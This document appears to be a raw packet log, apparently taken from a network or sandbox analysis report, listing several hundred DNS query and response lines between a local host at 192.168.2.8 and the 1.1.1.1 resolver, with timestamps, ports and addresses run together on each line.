                                                                                                                                                                                                          Nov 11, 2024 18:24:26.792217016 CET53580491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.794747114 CET53581501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.794855118 CET53563351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.802722931 CET6146353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.806876898 CET6016153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.806926012 CET5129753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.807336092 CET5386153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.807679892 CET5824253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.807992935 CET5011553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.808087111 CET6227053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.809783936 CET53614631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.810677052 CET5116553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.814362049 CET6375153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.815121889 CET53582421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.817300081 CET53538611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.817975998 CET53622701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.818958044 CET53601611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.819195032 CET5057153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.819401026 CET5758253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.820066929 CET53511651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.828928947 CET53575821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.838263035 CET53512971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840085983 CET6081453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840377092 CET53501151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840430021 CET5794653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840838909 CET5376453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841125965 CET5349153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841300011 CET5962653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841455936 CET5502953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841599941 CET6130353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841794014 CET5308453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.842164040 CET5476453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.846040010 CET53637511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847070932 CET4956053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847482920 CET6206053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847707987 CET53608141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847930908 CET5289253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.849441051 CET53579461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.850229025 CET5466553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.850265980 CET53537641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.850722075 CET53613031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.850733042 CET53505711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.850802898 CET53534911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.851425886 CET53550291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.852478027 CET53596261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.852865934 CET53547641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857214928 CET4991153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857395887 CET6198353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857527971 CET53620601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857667923 CET6370453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857764959 CET6535753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857969999 CET5816153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.858174086 CET5640653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859258890 CET53495601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859437943 CET5856853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859637976 CET53546651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859719038 CET5348753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.860219002 CET5123353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.860941887 CET4961453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861131907 CET6163453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861314058 CET6228453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861457109 CET5919453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863250971 CET5458753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863670111 CET6161853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863863945 CET5298453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864259958 CET5024353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864383936 CET6417153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864654064 CET6100353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866213083 CET5137153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866496086 CET6265353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866635084 CET53619831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.867913961 CET53581611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.867927074 CET53499111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.867948055 CET53512331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.868582010 CET6495453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.869714022 CET53653571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.869771957 CET53585681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.870081902 CET53622841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.871104002 CET53496141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.871967077 CET5839453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.873244047 CET53530841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.873650074 CET53616181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.874202967 CET53529841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.875319004 CET53610031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.875797987 CET6477353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.876034021 CET53513711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.876360893 CET53641711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.876883984 CET53626531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.880003929 CET53649541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.880887032 CET53528921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.885761976 CET53647731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.888865948 CET53637041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.890172958 CET53564061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.891881943 CET53534871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.892339945 CET53591941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.893105984 CET53616341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.895543098 CET53502431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.895926952 CET53545871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.902908087 CET53583941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.944689035 CET6244453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.954968929 CET53624441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.043806076 CET6022953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.044399977 CET5588653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.044576883 CET5795453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046649933 CET6393653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046806097 CET5282953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046891928 CET6324253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047094107 CET5317953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047094107 CET6465953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047254086 CET5231253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047333956 CET5229753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047441959 CET6272653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047537088 CET5818153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047617912 CET4940653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047755003 CET5065053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047786951 CET6326453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047974110 CET4997453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048012972 CET6146353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048141956 CET6253153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048202991 CET5581353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048396111 CET4931653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048618078 CET5815653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048978090 CET6344653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.050987005 CET5953053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051162958 CET5315953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051275015 CET6187353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051564932 CET5043853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051584005 CET5374053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051897049 CET5531253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051975965 CET5961953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052220106 CET6360853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052289963 CET6017253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052506924 CET5358353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052766085 CET5297953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053205013 CET5515453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053322077 CET53602291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053481102 CET6322653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053569078 CET5062453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053836107 CET5325853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054208994 CET53639361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054481030 CET53646591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054491043 CET53558861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054820061 CET5552853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054836988 CET53522971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054929972 CET53494061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.055160046 CET6463753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.056215048 CET53632421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.056927919 CET53528291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.057553053 CET5835253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058428049 CET53627261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058480024 CET53558131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058574915 CET53506501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058624029 CET4967653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058829069 CET53581561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058872938 CET53614631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.060300112 CET53634461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.060869932 CET53504381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.061599970 CET53537401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.061755896 CET53636081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.061969995 CET53596191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.062093019 CET53553121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.063674927 CET53535831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.064317942 CET53532581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.064455986 CET53551541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.065437078 CET53529791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.065736055 CET53646371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.067096949 CET53555281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.067451954 CET53583521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.069658041 CET53496761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.070051908 CET53531591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.076203108 CET53579541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.078227043 CET53499741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.079238892 CET53531791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.079345942 CET53581811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.079605103 CET53493161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.079751968 CET53632641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.080209970 CET53625311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.081984043 CET53595301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.083870888 CET53601721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.084604025 CET53506241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.086030006 CET53618731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.365426064 CET53632261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.367969990 CET53523121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.680341005 CET5077053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.691596031 CET53507701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.142807961 CET6420153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.143104076 CET5062753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.144449949 CET5923553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.145946980 CET5409053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.146138906 CET4967453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.147505045 CET5077853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.150376081 CET5415353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.153036118 CET53506271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.154618979 CET53642011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.156225920 CET53540901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.156861067 CET5807553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.158113003 CET53507781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.162700891 CET5971853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.162729979 CET6116953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.163642883 CET5543153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.167819023 CET53580751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.169131041 CET5193553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.169404984 CET6195953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.172744036 CET53597181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.173554897 CET5584453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.176136971 CET53592351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.176326990 CET5730053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.178838015 CET53496741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.178996086 CET53519351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.180125952 CET53619591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.180794954 CET5411453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181190014 CET53541531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181713104 CET53558441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181766033 CET5309353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.193423033 CET53611691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.195667982 CET53554311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.207741022 CET53573001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.213074923 CET53530931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.216315031 CET53541141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.266525984 CET6037053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.267201900 CET6046853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.267688036 CET6135553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.268639088 CET6466453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.269359112 CET6352553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.269737005 CET6514453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270389080 CET5183853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270623922 CET5395053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270844936 CET6080353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271014929 CET6187053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271219015 CET6283353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271672964 CET5370953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271744013 CET5438253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.272298098 CET6542853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.272603035 CET5996253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.273133039 CET6002853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.275228024 CET6062253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.275264978 CET53603701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.276806116 CET53604681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.277412891 CET53613551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280070066 CET53618701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280613899 CET53651441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280755997 CET53537091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280772924 CET53539501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.281085014 CET53628331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.281294107 CET53608031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.282484055 CET53543821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.282871008 CET53654281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.296979904 CET5846853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298160076 CET5743353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298367977 CET6384853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298588037 CET5205153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298660994 CET6154553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298768044 CET5240353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298887968 CET5764853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298981905 CET5310953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.299186945 CET4958353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.299186945 CET5971853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.299362898 CET5014153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.300831079 CET53635251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.301733971 CET5240953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.301801920 CET53646641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.302582979 CET53518381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.304579973 CET53600281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.305463076 CET53599621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.306380033 CET53606221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.306431055 CET53597181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.307849884 CET53584681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308090925 CET53638481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308191061 CET53574331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308552027 CET53576481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308929920 CET53495831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.309293985 CET53615451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.309437990 CET53524031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.310678005 CET53501411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.311569929 CET6235953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.311758041 CET6446353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.312074900 CET5405653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.313688040 CET5222153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314276934 CET5811753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314462900 CET5804853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314636946 CET6031453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314825058 CET5388453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315205097 CET5543253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315289974 CET5207853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315557003 CET6114453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315795898 CET5414653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315874100 CET5899253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.321921110 CET53644631.1.1.1192.168.2.8
